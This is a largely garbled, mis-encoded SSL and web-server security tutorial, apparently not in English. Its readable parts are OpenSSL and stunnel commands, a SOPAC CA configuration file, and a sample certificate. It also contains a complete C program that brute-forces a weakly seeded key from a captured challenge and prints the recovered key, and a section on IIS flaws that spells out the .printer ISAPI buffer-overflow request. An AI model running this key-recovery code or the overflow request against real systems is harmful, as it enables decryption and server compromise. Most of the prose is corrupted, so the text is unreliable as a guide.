a T) , -inform $PEM , , -outform $PEM , , ' NET F) 3 CSR 2 G ' PEM ?@ e Y 4 , 0,< DER 0 0, -, ) ) CSR 2 G PEM ?@ e Y 4 , 0,< DER 0 -in filename 6 & d* CSR , ) ) CSR 3 % < NET ) )% ' - Y & 2 " 0 < -out filename " 0, d* , CSR -,< < ?@ ) ) CSR ) )" B' - Y & 2 0 < -text 7 -, < , 1/ 0, -noout CSR F) 3 CSR -)8! ' -, 3 F) 3 6, B' & - 6, B '-,< , ( ' & 2 " - Y 0, < 5 -modulus F) 3 6 5! , B modulus 5 H %3 0, -serial -hash 0, 0, -subject -issuer 6D F) 3 6D F) 3 0, 0, 6D 6 6 S/ 6D F) 3 6D F) 3 6 6D T - 5< ( hash , 6 ( -, S/ ( -email 6 D F) 3 6 S/ # ) #1 4h @ 0, -startdate 0, -enddate -dates 6D z) 3 0, 0, 6D z) 3 6D F) 3 -fingerprint 0, -signkey filename 6 > 6D F) 3 6 < E filename > v ) ), v 1E ;! ' v 6 6 root 6 ), > & 2 " - Y H L3 , B " - Y 0 < -keyform , , ) ) L3 , B PEM ?@ e Y 4 , ,< DER 0 -days n d* P! ?& n ,< -,< - Y -x509 6 % , PCSR - Y d* 6 -signkey 2 PEM & " 0, -x509toreq , B " 0, & ' & 2 -,< - L3 0 < -req -, 3 ) )? ! -, 3 ) ) 6 e Y 4 CSR 1/ & 2 " - Y 0 < 0 < -CA filename ? > 6 0 < -CAkey filename " ? -CAserial d* filename 4( " & nB G & 2 b 6 d* ), & 2 b 7 P ! % '2 ( 4 -)8! 
, 6 E ), < & 6CERTICATE T 0srl , -CAcreateserial d* > 0 < ), 6 - Y L3 , B < - Y ?@ - 5< ) / % ' e Y 4 , 0, & 6certificate T ^ 6 - 5< % ' filename -extfile filename , H ?@ 6extention - Y 0, -extensions section & 2 " W 3 extention 6 d* ? )&' 0 < a,6 ? 6 B' 7 !89 - Y "

    openssl x509 -in cert.pem -noout -text

a,6 ? 6 T - 5< "

    openssl x509 -in cert.pem -noout -serial

a,6 ? 6 S/ ( "

    openssl x509 -in cert.pem -noout -subject

a,6 ? 6 1E > "

    openssl x509 -in cert.pem -noout -fingerprint

% ,P DER a, ' PEM '" 6 "

    openssl x509 -in cert.pem -inform PEM -out cert.der -outform DER

a, % ,P CSR 6 "

    openssl x509 -x509toreq -in cert.pem -out req.pem -signkey key.pem

a, % ,Proot 6 CSR "

    openssl x509 -req -in careq.pem -signkey key.pem -out cacert.pem

> 6 ), & L3 , B ) 6 " - Y CSR " a,

    openssl x509 -req -in req.pem -CA cacert.pem -CAkey key.pem -CAcreateserial

F) 1/ ) SSL b a -,< & 7 !89 ? ) , #4 ? ! . ? @2 & " H ) ,< " , T) , " U4 - 1/ ) a 2 U) … ], 5 T # , U) 5 -, < - < Stunnel ) ) 6 F) 3 ' ), ,< 6 @ 9 ] ,< -, < & " ' - Y SSL Wrapper \ 2 0 E n 9 2, ? ) I 0_ IMAP ) 6 &'( 7Y SSL 5 SSL 1/ 2 " , ? SSL " - Y ?# 'X ?@ ) ' 6 &'( I 0 _Apache O) ) b' 1/ 2 7 !89 T 6U ) SSL 7 # ) ,< 0 & =B* ' a ' ) ) L3 , B L3 , B ,1

    openssl genrsa -out key.pem 1024

a CSR 0 L3 , B b ?@ ? > a 6 ' ), CSR ? & " - Y CSR ? " ,1 ' > openssl x509 – req – in csr. Pem – signkey key key. Pem – pem – out . pem – days 365 POP3 ) - 56 Stunnel &'( SSL " -,Y - . \ X " POP3 ) ?,< - 56 SSL " - Y a 2#5 n 9 ) 2<) 5 H2 < - iX Stunnel " 0 < - Y 7 4 @)- ,6 A a ' {{Š - 5 < 7 wwq - 5 < 7 4 H ) 6script 7 4" b , 7 !89 Stunnel -, < & 7 !89 2 ) , " 7 Y wwq - 5< 2 0, < A" 4

    stunnel -d 995 -p /usr/local/ssl/certs/stunnel.pem -r localhost:110

U) , )" ' 7 -,< & 7 !89 Stunnel {{Š - 5< 7 4 " 2 0, F -, < & a !89 2 A" H 4 6Script 7

    stunnel -d 995 -p /usr/local/ssl/certs/stunnel.pem -l /usr/sbin/imapd

) L3 , B % < S stunnel.pem c % ' , B " , G Stunnel.pem % ' 0, < 0,< < _ -, F) , & ) 7 13 : 6 ] ) ) W 3 L*< ¢ ^P 2 0, , — ) ? 
59 5 < ? 3 IE " , 6 6 , 5 '— " 5< - P< ?# !89 % < , : 56 6 0_ B # %. $ P! 7, $ % 5 h @ $ ( , 56$ - 5 > 7 !89 2 L*< 1 E hash % H 56 ? 4 ) H , > ) 5< '2 F T/ 6 ?@ S/ )h @ 5! , B % < 6 I " - Y ) 6 CA 0 5! - ›, ) > )- R , $O) CA ' 7 !89 7 )&B " 5< @ & L3 0 @^ 2 0, —L*< — 5< , 5 ) R 6 6 ) 1E N 2 2 `560 0,< $, - 5 ^P < ? 59 6 ], 7 !89 ) ), N c 5G 5< " €,< $, 6 ? 59 ) L3 —6 M 9 ?@ — › GH ) @ €, - › '2 ) - ) 6 " ,G & ) a Certificate ? I 6 5< 5! & 5 ' N 56 6 c 5G 0,< C 2 SSL (Certificate Autority) 6> 56 1% < a "7 —6 ¢ 2 * A) CA.pl −newcert (openssl req −config /etc/openssl.cnf −new −x509 −keyout newreq.pem \ −out newreq.pem −days 365) # b F 6 6 6 0 , ( 5 0, ? 59 % H g 5 <$ 1E u) j -,< > 3 6 0, ?@ 66 6 > " )% HC 8 -, < > $, T 6 6 ) > A 3 \ 2 " 6CA 6 a 6 6 2 " # " 5 Certificate: Data: Version: 3 (0x2) Serial Number: 1 (0x1) Signature Algorithm: md5WithRSAEncryption Issuer: C=FJ, ST=Fiji, L=Suva, O=SOPAC, OU=ICT, CN=SOPAC Root CA/[email protected] Not Before: Nov 20 05:47:44 2001 GMT Not After : Nov 20 05:47:44 2002 GMT Subject: C=FJ, ST=Fiji, L=Suva, O=SOPAC, CN=www.sopac.org/[email protected] Info: Public Key Algorithm: rsaEncryption RSA Public Key: (1024 bit) Modulus (1024 bit): 00:ba:54:2c:ab:88:74:aa:6b:35:a5:a9:c1:d0:5a: 9b:fb:6b:b5:71:bc:ef:d3:ab:15:cc:5b:75:73:36: b8:01:d1:59:3f:c1:88:c0:33:91:04:f1:bf:1a:b4: 7a:c8:39:c2:89:1f:87:0f:91:19:81:09:46:0c:86: 08:d8:75:c4:6f:5a:98:4a:f9:f8:f7:38:24:fc:bd: 94:24:37:ab:f1:1c:d8:91:ee:fb:1b:9f:88:ba:25: da:f6:21:7f:04:32:35:17:3d:36:1c:fb:b7:32:9e: 42:af:77:b6:25:1c:59:69:af:be:00:a1:f8:b0:1a: 6c:14:e2:ae:62:e7:6b:30:e9 Exponent: 65537 (0x10001) X509v3 extensions: OU=ICT, Public Key X509v3 Basic Constraints: CA:FALSE Netscape Comment: OpenSSL Generated Certificate X509v3 Subject Key Identifier: FE:04:46:ED:A0:15:BE:C1:4B:59:03:F8:2D:0D:ED:2A:E0:ED:F9:2F X509v3 Authority Key Identifier: keyid:E6:12:7C:3D:A1:02:E5:BA:1F:DA:9E:37:BE:E3:45:3E:9B:AE:E5 :A6 DirName:/C=FJ/ST=Fiji/L=Suva/O=SOPAC/OU=ICT/CN=SOPAC Root 
CA/Email=administrator@serial:00 Signature Algorithm: md5WithRSAEncryption nB G 5! , B 0 n: # " ? 59 ,B 6 T ?@ # 0, › 6 , B 0 B . " B . # ] < - Y 6 6 'X R & T -, '-,< , ?@ S/ b -, < -,< > ( 4 F 6 6 b' 2 0 <- , P! $ N 56 2 S/ 7 !89 F " , P & 6, B 2 & ' 56 ) / 6 )/ > ? 
") 6 2 N %. - Y GF " , # 3 L3 L3 , B N 7 P ! 6- ) 6 6 , P) $, < R & ( 4b . , )_ L3 a OpenSSL , #4% ' #−−−Begin−−− # # OpenSSL example configuration file. # This is mostly being used for generation of certificate requests. # RANDFILE = $ENV::HOME/.rnd oid_file = $ENV::HOME/.oid oid_section = new_oids # To use this configuration file with the "−extfile" option of the # "openssl x509" utility, name here the section containing the # X.509v3 extensions to use: # extensions = # (Alternatively, use a configuration file that has only # X.509v3 extensions in its main [= default] section.) [ new_oids ] # We can add new OIDs in here for use by ' ca'and ' req' . # Add a simple OID like this: # testoid1=1.2.3.4 # Or use config file substitution like this: # testoid2=${testoid1}.5.6 ########################################################### ######### [ ca ] default_ca = CA_default # The default ca section ########################################################### ######### [ CA_default ] dir = /var/ssl # Where everything is kept certs = $dir/certs # Where the issued certs are kept crl_dir = $dir/crl # Where the issued crl are kept database = $dir/index.txt # database index file. new_certs_dir = $dir/newcerts # default place for new certs. certificate = $dir/cacert.pem # The CA certificate serial = $dir/serial # The current serial number crl = $dir/crl.pem # The current CRL private_key = $dir/private/cakey.pem # The private key RANDFILE = $dir/private/.rand # private random number file x509_extensions = usr_cert # The extentions to add to the cert # Extensions to add to a CRL. Note: Netscape communicator chokes on V2 CRLs # so this is commented out by default to leave a V1 CRL. # crl_extensions = crl_ext default_days = 365 # how long to certify for default_crl_days= 7 # how long before next CRL default_md = sha1 # which md to use. 
preserve = no # keep passed DN ordering # A few difference way of specifying how similar the request should look # For type CA, the listed attributes must be the same, and the optional # and supplied fields are just that :−) policy = policy_match # For the CA policy [ policy_match ] countryName = match stateOrProvinceName = optional localityName = match organizationName = match organizationalUnitName = optional commonName = supplied emailAddress = optional # For the ' anything'policy # At this point in time, you must list all acceptable ' object' # types. [ policy_anything ] countryName = optional stateOrProvinceName = optional localityName = optional organizationName = optional organizationalUnitName = optional commonName = supplied emailAddress = optional ########################################################### ######### [ req ] default_bits = 1024 default_keyfile = privkey.pem distinguished_name = req_distinguished_name attributes = req_attributes default_md = sha1 x509_extensions = v3_ca # The extentions to add to the self signed cert # Passwords for private keys if not present they will be prompted for # input_password = secret # output_password = secret # This sets a mask for permitted string types. There are several options. # default: PrintableString, T61String, BMPString. # pkix : PrintableString, BMPString. # utf8only: only UTF8Strings. # nombstr : PrintableString, T61String (no BMPStrings or UTF8Strings). # MASK:XXXX a literal mask value. # WARNING: current versions of Netscape crash on BMPStrings or UTF8Strings # so use this option with caution! 
string_mask = nombstr # req_extensions = v3_req # The extensions to add to a certificate request [ req_distinguished_name ] countryName = Country Name (2 letter code) countryName_default = FJ countryName_min = 2 countryName_max = 2 stateOrProvinceName = State or Province Name (full name) stateOrProvinceName_default = Fiji localityName = Locality Name (eg, city) localityName_default = Suva 0.organizationName = Organization Name (eg, company) 0.organizationName_default = SOPAC # we can do this but it is not needed normally :−) #1.organizationName = Second Organization Name (eg, company) #1.organizationName_default = World Wide Web Pty Ltd organizationalUnitName = Organizational Unit Name (eg, section) organizationalUnitName_default = ITU commonName = Common Name (eg, YOUR name) commonName_max = 64 emailAddress = Email Address emailAddress_max = 40 # SET−ex3 = SET extension number 3 [ req_attributes ] challengePassword = A challenge password challengePassword_min = 4 challengePassword_max = 20 unstructuredName = An optional company name [ usr_cert ] # These extensions are added when ' ca'signs a request. # This goes against PKIX guidelines but some CAs do it and some software # requires this to avoid interpreting an end user certificate as a CA. basicConstraints=CA:FALSE # Here are some examples of the usage of nsCertType. If it is omitted # the certificate can be used for anything *except* object signing. # This is OK for an SSL server. # nsCertType = server # For an object signing certificate this would be used. # nsCertType = objsign # For normal client use this is typical # nsCertType = client, email # and for everything including object signing: # nsCertType = client, email, objsign # This is typical in keyUsage for a client certificate. # keyUsage = nonRepudiation, digitalSignature, keyEncipherment # This will be displayed in Netscape' s comment listbox. 
nsComment = "Certificate issued by https://www.sopac.org/ssl/" # PKIX recommendations harmless if included in all certificates. subjectKeyIdentifier=hash authorityKeyIdentifier=keyid,issuer:always # This stuff is for subjectAltName and issuerAltname. # Import the email address. # subjectAltName=email:copy # Copy subject details # issuerAltName=issuer:copy # This is the base URL for all others URL addresses # if not supplied nsBaseUrl = https://www.sopac.org/ssl/ # This is the link where to download the latest Certificate # Revocation List (CRL) nsCaRevocationUrl = https://www.sopac.org/ssl/sopac−ca.crl # This is the link where to revoke the certificate nsRevocationUrl = https://www.sopac.org/ssl/revocation.html? # This is the location where the certificate can be renewed nsRenewalUrl = https://www.sopac.org/ssl/renewal.html? # This is the link where the CA policy can be found nsCaPolicyUrl = https://www.sopac.org/ssl/policy.html # This is the link where we can get the issuer certificate issuerAltName = URI:https://www.sopac.org/ssl/sopac.crt # This is the link where to get the latest CRL crlDistributionPoints = URI:https://www.sopac.org/ssl/sopac−ca.crl [ v3_ca ] # Extensions for a typical CA # PKIX recommendation. subjectKeyIdentifier=hash authorityKeyIdentifier=keyid:always,issuer:always # This is what PKIX recommends but some broken software chokes on critical # extensions. # basicConstraints = critical,CA:true # So we do this instead. basicConstraints = CA:true # Key usage: this is typical for a CA certificate. However since it will # prevent it being used as an test self−signed certificate it is best # left out by default. # keyUsage = cRLSign, keyCertSign # Some might want this also # nsCertType = sslCA, emailCA # Include email address in subject alt name: another PKIX recommendation # subjectAltName=email:copy # Copy issuer details # issuerAltName=issuer:copy # RAW DER hex encoding of an extension: beware experts only! 
# 1.2.3.5=RAW:02:03 # You can even override a supported extension: # basicConstraints= critical, RAW:30:03:01:01:FF # This will be displayed in Netscape' s comment listbox. nsComment = "Certificate issued by https://www.sopac.org/ssl/" # This is the base URL for all others URL addresses # if not supplied nsBaseUrl = https://www.sopac.org/ssl/ # This is the link where to download the latest Certificate # Revocation List (CRL) nsCaRevocationUrl = https://www.sopac.org/ssl/sopac−ca.crl # This is the link where to revoke the certificate nsRevocationUrl = https://www.sopac.org/ssl/revocation.html? # This is the location where the certificate can be renewed nsRenewalUrl = https://www.sopac.org/ssl/renewal.html? # This is the link where the CA policy can be found nsCaPolicyUrl = https://www.sopac.org/ssl/policy.html # This is the link where we can get the issuer certificate issuerAltName = URI:https://www.sopac.org/ssl/sopac.crt # This is the link where to get the latest CRL crlDistributionPoints = URI:https://www.sopac.org/ssl/sopac−ca.crl [ crl_ext ] # CRL extensions. # Only issuerAltName and authorityKeyIdentifier make any sense in a CRL. # issuerAltName=issuer:copy authorityKeyIdentifier=keyid:always,issuer:always #−−−−End−−−− a =B* a 6 _CA] 6 ,F 'X " ) 2 ) SL A) 6 , Openssl. X 509 - in cacert.pem – out cacert.crt a "h @ ,6 H? 3 O) -,< E % '2 http://yoursite.com/ssl/cacert.crt ? < crt \ " ,< 0 <– R •Y , $, ) - 3• H . , " U4 @ P < 5< 6 #6•Y " & 5 <0 < ") 6 3 6 @ B F ") 0, 5 'X , " j ? •Y b update 'G 3- B 5F " ) - 3•S B Netscapeb 2 0, K5 %. ? 5 5< @ ) ,6 d * SL %/ N4 ) < (E 6& \ , C 5 / SL B / ? 4 %P H" , d* 0 … ) 6,› 3 5 $%5 5! @ 6> $ ? 'X 0, 6 , F) ) SL ), < SL A) O) " 0, 5 YB* ("c – 6— 6 , 3% ! ') # —6 5< < 6 ), Nh5 -N4 # F ') # P # 7, , # 5< ) a Mozilla ) Netscape : O) # - , , " ,6 * ? O) $ ) 42 5< ) -,< - @ 5< 6 F? 0 6 b 2 `56, 5 6 3 j< 4 ) ), O) ) , CA 6 CA , < ) $ " " , < MIME \ " B' 7 # 6 - Y O) $ % ! 
a Galeon ) ,< ,6 3 6 2 " , –6 SL A) HTML 5F 0 " ) F) Galeon , 6 6 " $, % 5! Mozilla , 3 & 2 CH Galeon ), a Internet Explorer I'/ ) " 0 9 6 D ?@ S L @ 2 2 T % ') - 3 6 & d* , B- : IE _-, < Z> 6,G 6 3] I.12 " , F SSL %•) 4 " , — ) h @ ) - Y SL A) ? ) b ) % ' ) 0, K5 - 3• 3 , 3 6 SL 5! ,6 3 5 ! 6 2 # KE @ 6 6 ,< -,< Z> CA 0, K5 - Y 6- aC?"

    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>   /* strlen, memcmp */

    typedef unsigned int UINT4;

    #define S11 7
    #define S12 12
    #define S13 17
    #define S14 22
    #define S21 5
    #define S22 9
    #define S23 14
    #define S24 20
    #define S31 4
    #define S32 11
    #define S33 16
    #define S34 23
    #define S41 6
    #define S42 10
    #define S43 15
    #define S44 21

    #define F(x, y, z) (((x) & (y)) | ((~x) & (z)))
    #define G(x, y, z) (((x) & (z)) | ((y) & (~z)))
    #define H(x, y, z) ((x) ^ (y) ^ (z))
    #define I(x, y, z) ((y) ^ ((x) | (~z)))

    /* ROTATE_LEFT rotates x left n bits. */
    #define ROTATE_LEFT(x, n) (((x) << (n)) | ((x) >> (32-(n))))

    /* FF, GG, HH, and II transformations for rounds 1, 2, 3, and 4.
       Rotation is separate from addition to prevent recomputation. */
    #define FF(a, b, c, d, x, s, ac) { \
        (a) += F ((b), (c), (d)) + (x) + (UINT4)(ac); \
        (a) = ROTATE_LEFT ((a), (s)); \
        (a) += (b); \
    }
    #define GG(a, b, c, d, x, s, ac) { \
        (a) += G ((b), (c), (d)) + (x) + (UINT4)(ac); \
        (a) = ROTATE_LEFT ((a), (s)); \
        (a) += (b); \
    }
    #define HH(a, b, c, d, x, s, ac) { \
        (a) += H ((b), (c), (d)) + (x) + (UINT4)(ac); \
        (a) = ROTATE_LEFT ((a), (s)); \
        (a) += (b); \
    }
    #define II(a, b, c, d, x, s, ac) { \
        (a) += I ((b), (c), (d)) + (x) + (UINT4)(ac); \
        (a) = ROTATE_LEFT ((a), (s)); \
        (a) += (b); \
    }

    void MD5Transform1(unsigned char state[16], unsigned char block[64])
    {
        UINT4 a = 0x67452301, b = 0xefcdab89, c = 0x98badcfe, d = 0x10325476, x[16];
        unsigned int i, j;

        for (i = 0, j = 0; j < 64; i++, j += 4)
            x[i] = ((UINT4)block[j]) | (((UINT4)block[j+1]) << 8) |
                   (((UINT4)block[j+2]) << 16) | (((UINT4)block[j+3]) << 24);

        /* Round 1 */
        FF (a, b, c, d, x[ 0], S11, 0xd76aa478); /* 1 */
        FF (d, a, b, c, x[ 1], S12, 0xe8c7b756); /* 2 */
        FF (c, d, a, b, x[ 2], S13, 0x242070db); /* 3 */
        FF (b, c, d, a, x[ 3], S14, 0xc1bdceee); /* 4 */
        FF (a, b, c, d, x[ 4], S11, 0xf57c0faf); /* 5 */
        FF (d, a, b, c, x[ 5], S12, 0x4787c62a); /* 6 */
        FF (c, d, a, b, x[ 6], S13, 0xa8304613); /* 7 */
        FF (b, c, d, a, x[ 7], S14, 0xfd469501); /* 8 */
        FF (a, b, c, d, x[ 8], S11, 0x698098d8); /* 9 */
        FF (d, a, b, c, x[ 9], S12, 0x8b44f7af); /* 10 */
        FF (c, d, a, b, x[10], S13, 0xffff5bb1); /* 11 */
        FF (b, c, d, a, x[11], S14, 0x895cd7be); /* 12 */
        FF (a, b, c, d, x[12], S11, 0x6b901122); /* 13 */
        FF (d, a, b, c, x[13], S12, 0xfd987193); /* 14 */
        FF (c, d, a, b, x[14], S13, 0xa679438e); /* 15 */
        FF (b, c, d, a, x[15], S14, 0x49b40821); /* 16 */

        /* Round 2 */
        GG (a, b, c, d, x[ 1], S21, 0xf61e2562); /* 17 */
        GG (d, a, b, c, x[ 6], S22, 0xc040b340); /* 18 */
        GG (c, d, a, b, x[11], S23, 0x265e5a51); /* 19 */
        GG (b, c, d, a, x[ 0], S24, 0xe9b6c7aa); /* 20 */
        GG (a, b, c, d, x[ 5], S21, 0xd62f105d); /* 21 */
        GG (d, a, b, c, x[10], S22, 0x2441453); /* 22 */
        GG (c, d, a, b, x[15], S23, 0xd8a1e681); /* 23 */
        GG (b, c, d, a, x[ 4], S24, 0xe7d3fbc8); /* 24 */
        GG (a, b, c, d, x[ 9], S21, 0x21e1cde6); /* 25 */
        GG (d, a, b, c, x[14], S22, 0xc33707d6); /* 26 */
        GG (c, d, a, b, x[ 3], S23, 0xf4d50d87); /* 27 */
        GG (b, c, d, a, x[ 8], S24, 0x455a14ed); /* 28 */
        GG (a, b, c, d, x[13], S21, 0xa9e3e905); /* 29 */
        GG (d, a, b, c, x[ 2], S22, 0xfcefa3f8); /* 30 */
        GG (c, d, a, b, x[ 7], S23, 0x676f02d9); /* 31 */
        GG (b, c, d, a, x[12], S24, 0x8d2a4c8a); /* 32 */

        /* Round 3 */
        HH (a, b, c, d, x[ 5], S31, 0xfffa3942); /* 33 */
        HH (d, a, b, c, x[ 8], S32, 0x8771f681); /* 34 */
        HH (c, d, a, b, x[11], S33, 0x6d9d6122); /* 35 */
        HH (b, c, d, a, x[14], S34, 0xfde5380c); /* 36 */
        HH (a, b, c, d, x[ 1], S31, 0xa4beea44); /* 37 */
        HH (d, a, b, c, x[ 4], S32, 0x4bdecfa9); /* 38 */
        HH (c, d, a, b, x[ 7], S33, 0xf6bb4b60); /* 39 */
        HH (b, c, d, a, x[10], S34, 0xbebfbc70); /* 40 */
        HH (a, b, c, d, x[13], S31, 0x289b7ec6); /* 41 */
        HH (d, a, b, c, x[ 0], S32, 0xeaa127fa); /* 42 */
        HH (c, d, a, b, x[ 3], S33, 0xd4ef3085); /* 43 */
        HH (b, c, d, a, x[ 6], S34, 0x4881d05); /* 44 */
        HH (a, b, c, d, x[ 9], S31, 0xd9d4d039); /* 45 */
        HH (d, a, b, c, x[12], S32, 0xe6db99e5); /* 46 */
        HH (c, d, a, b, x[15], S33, 0x1fa27cf8); /* 47 */
        HH (b, c, d, a, x[ 2], S34, 0xc4ac5665); /* 48 */

        /* Round 4 */
        II (a, b, c, d, x[ 0], S41, 0xf4292244); /* 49 */
        II (d, a, b, c, x[ 7], S42, 0x432aff97); /* 50 */
        II (c, d, a, b, x[14], S43, 0xab9423a7); /* 51 */
        II (b, c, d, a, x[ 5], S44, 0xfc93a039); /* 52 */
        II (a, b, c, d, x[12], S41, 0x655b59c3); /* 53 */
        II (d, a, b, c, x[ 3], S42, 0x8f0ccc92); /* 54 */
        II (c, d, a, b, x[10], S43, 0xffeff47d); /* 55 */
        II (b, c, d, a, x[ 1], S44, 0x85845dd1); /* 56 */
        II (a, b, c, d, x[ 8], S41, 0x6fa87e4f); /* 57 */
        II (d, a, b, c, x[15], S42, 0xfe2ce6e0); /* 58 */
        II (c, d, a, b, x[ 6], S43, 0xa3014314); /* 59 */
        II (b, c, d, a, x[13], S44, 0x4e0811a1); /* 60 */
        II (a, b, c, d, x[ 4], S41, 0xf7537e82); /* 61 */
        II (d, a, b, c, x[11], S42, 0xbd3af235); /* 62 */
        II (c, d, a, b, x[ 2], S43, 0x2ad7d2bb); /* 63 */
        II (b, c, d, a, x[ 9], S44, 0xeb86d391); /* 64 */

        a += 0x67452301;
        b += 0xefcdab89;
        c += 0x98badcfe;
        d += 0x10325476;

        /* We need to swap endianness here */
        state[0] = ((unsigned char *)&a)[3];
        state[1] = ((unsigned char *)&a)[2];
        state[2] = ((unsigned char *)&a)[1];
        state[3] = ((unsigned char *)&a)[0];
        state[4] = ((unsigned char *)&b)[3];
        state[5] = ((unsigned char *)&b)[2];
        state[6] = ((unsigned char *)&b)[1];
        state[7] = ((unsigned char *)&b)[0];
        state[8] = ((unsigned char *)&c)[3];
        state[9] = ((unsigned char *)&c)[2];
        state[10] = ((unsigned char *)&c)[1];
        state[11] = ((unsigned char *)&c)[0];
        state[12] = ((unsigned char *)&d)[3];
        state[13] = ((unsigned char *)&d)[2];
        state[14] = ((unsigned char *)&d)[1];
        state[15] = ((unsigned char *)&d)[0];
    }

    #define mklcpr(val) ((0xdeece66d*(val)+0x2bbb62dc)>>1)

    int main(int argc, char **argv)
    {
        int i;
        unsigned char maybe_challenge[16], true_challenge[16];
        unsigned char key[16];
        char *p;
        unsigned long sec, usec, pid, ppid;
        unsigned char eblock[64], cblock[64];
        unsigned char *o1;
        int o2;

        if (argc == 5 && strlen(argv[4]) >= 47) {
            sec = strtol(argv[1], (char **) 0, 0);
            pid = strtol(argv[2], (char **) 0, 0);
            ppid = strtol(argv[3], (char **) 0, 0);
            p = argv[4];
            for (i=0; i<16; i++) {
                true_challenge[i] = strtol(p, &p, 16);
                p++;
            }
        } else {
            printf("Usage: %s sec pid ppid "
                   "00:11:22:33:44:55:66:77:88:99:aa:bb:cc:dd:ee:ff\n", argv[0]);
            exit(1);
        }

        /* Set up eblock and cblock */
        for(i=0;i<64;++i) eblock[i]=0;
        eblock[8] = 0x80;
        eblock[56] = 0x40;
        for(i=0;i<64;++i) cblock[i]=0;
        cblock[16] = 0x80;
        cblock[56] = 0x80;

        ((int *)eblock)[1] = mklcpr(pid+sec+(ppid<<12));

        for (usec=0; usec < (1<<20); usec++) {
            ((int *)eblock)[0] = mklcpr(usec);
            MD5Transform1(cblock, eblock);

            o2 = 0;
            o1 = &(cblock[0x0f]);
            do {
                if ((*o1)++) break;
                --o1;
            } while (++o2 <= 0x0f);

            o2 = 0;
            o1 = &(cblock[0x0f]);
            do {
                if ((*o1)++) break;
                --o1;
            } while (++o2 <= 0x0f);

            MD5Transform1(maybe_challenge, cblock);

            if (memcmp(maybe_challenge, true_challenge, 0x10) == 0) {
                printf("Found it! The key is ");
                o2 = 0;
                o1 = &(cblock[0x0f]);
                do {
                    if ((*o1)++) break;
                    --o1;
                } while (++o2 <= 0x0f);
                MD5Transform1(key, cblock);
                for (i=0; i<0x10; i++)
                    printf("%2.2X ", (unsigned char) key[i]);
                printf("\n");
                printf("usec = %lu\n", usec);
                exit(0);
            }
        }

        printf("Not found.\n");
        exit(1);
    }

Microsoft internet information server (IIS) T , ) O) 6) 2 0,< " 6b. 2 O) ? •Y B 5/ 1! M,6 -,< ;! 256) YGX$? # B) )h 4 2 +' , ,F n & n 9" IIS ) ( < 6* a I , B , ) 6=GX \ Y, YGX 6 Y1 IIS # G ) 6, i X 0,E N T) E 785/ 2 ) P1 # (DLL) # B 6 6 * ) 4 , " ! 5E H ) 6$;.P 2 @ ! 6 Y1 £ B ! B 5/ - % G N, # B ! B 5/… 3 B ! B 5/… ? IIS - P1, -,< IIS ? IIS 1Q ? #<@ - NB 4 6F 6ˆ4 b -,< K , ,F 7c L. " -) " F$showcode.asp 7 2 `56) , -,< K 0, -,< K H O) ? • Y 785/ )_MDAC/RDS]- ' & 3 3 2 " 5 - " #<@$::$DATA P <6 7 !89 " ? 0 ) # IIS 4" 56% 1 256 0 6=GX 7 - Y 7 IIS ! 5E 2 inetinfo.exe$ ,6* 0, - % ' b .prniter, , 4 % ' E " DDL 3 B'2 - TQ 0 < 6 K 7 B ) 256 ) , 6 v 4 $, 3 IIS " E B 5! 7 L3 , 4 -, < / 9 DDL " $_, < 3 F % '2 0, bP - N 4 j 40 N ISAPI 7 B 5! ( E w 3 PHP)COLdfusion I K6-, " /7 IIS S L ? " ) - 1 @ B) " - 6 B'" $IIS0, 5 ), @0 , 3 f 0, % ' $ 1 2 3 'j 4 7 5G 2 ISAPI " - Y P4 F ' R4 S @ ^ ISAPI 6 H B 5/ $n 9 2 " ,< O * " 6 ' ? 5F 6 @^ F -, 6 U ) ) ) 6% L * iX 0, 4 ) 7 # 0_URL 6=GX) 78# ) -, < - )@ o " ], 5 , 5 7 6 5$ ), 6' -, 6 U ) ) i. ) H ? 5F $ F 6 ) nH , ,F R4 S @ ^ F) N ntdll.dll webDAV SL IIS ) T#< ) =GX 3 " F 6h @ I ], N 0, 5 6 ' -, < SL T L. " N 6 ) ) " ?5F 3 - *1 7 _PHP)coldfusion $ R4 S @ ^ H $O) ( N (, !0, - 5 - Y F F) E ) ) 6URLb 6 , N) # 6, 6DLL ? 5 TG' g]dos \ " 785/ ?# $ IIS 5.0 3 I g " l '=GX " 8Q 0 )@ C _SL ] 7 L ? 56 B ) - Y $O) 2 56, -,< I N "$ 1 ) S L " U 4 IISS R 4S 6 L C85! ) - PS L B'\ 2 " " E + E'IIS 6 ) )‚ code red2 ) code red0, _U ) k " ,G , 5 -,< ;! - Y Z % .6 3 M ,6 )e ? •Y B3 3 4 RN $p ISAPI -,< ,F ) W 3 7 B 5! (&B $ ISAPI 6 B'" ) O) V < )_server side includes]SSI$_active server pages]ASP k ? 
P1] 3 ], < 7 ) X ") F ", ) & , # 4 (,! % 1 , , & IIS 1Q0_ N T L. ,< T L. 1 -handel internet server application programming interface 2 <R 1 , n 9 " 785/ 1 ) ) N , GH ) 1QZ&F P 10 I, 6, -" F -,< ? 0, - @- - Y Z < ISAPI 0 < ISAPI DLL 0, < ' & IIS O) b - 4 ' ( E ISAPI ) 785/$ < 6) & " 4 pqqp T 785/ 2 6=GX " " j* 2 N # pqqp T 2 ' 0 & % )@ = P 4 HTTP , @ - 1 @ b ISAPI DLL ) ^ ? eEye n 9" k ‹pq C P 0 @ 1Q F ' & 3 " # Digital security$pqqw ISAPI B' % # ) 4_c:\winnt\system32\msw3prt.dll] B' k #P < 6 N4 "T Q -,< " 0 printer P 4 _IPP]s # 3) h 0, - (8! $, 0, ) ) pqqw T Ÿ 0 6 B'?) " 60, , < ? ) nimda)codered ) ASP 7 .Y 0, < +P 85/ 2 % 6ISAPI DLL O) ) -,< @" <- =B* ' ,@ 'printer F ISAPI 0 ',6 3 lY 2 IPP0, 6 PF H) Ÿ HOST 3 6 2 420[buffer] 5 H H GET/NUL.printer HTTP/1.0 HOST:[buffer] "), ) < < <& ;! )_information], =GX 2 ;! , IIS) 0 < P 10, ' F- ) " , - e 'j 4 ) < ;! - IIS 1 ) 7 1/ 1P 7 L ;! $ < " , - - ) IIS # N60_ < B H B G 1/ ) , 2 pqqq O) ,4 ‚,6 H) # &F ] 3 ) IIS . [ ˆ6 ) ) ,6 Ÿ IIS 3 'L 2' R 6:3 internet printing protocol ISAPI DLL 5 printer ' & b )@ 6 3 + F) ISAPI DLL j 5 !89 ? , ,< F) ? # " %P H " ,< l ' bB g +P % '2 < " - Y , 5< +.htr 3 F) ISAPI DLL @j 5 ,< , - j 5 - 3 ) , F" G F 0, ,6 =GX $ < F IIS b <N ISM.DLL htr.txt ( F % '+ ISM.DLL -, ,< '0 ! 1/ 7 < " 3 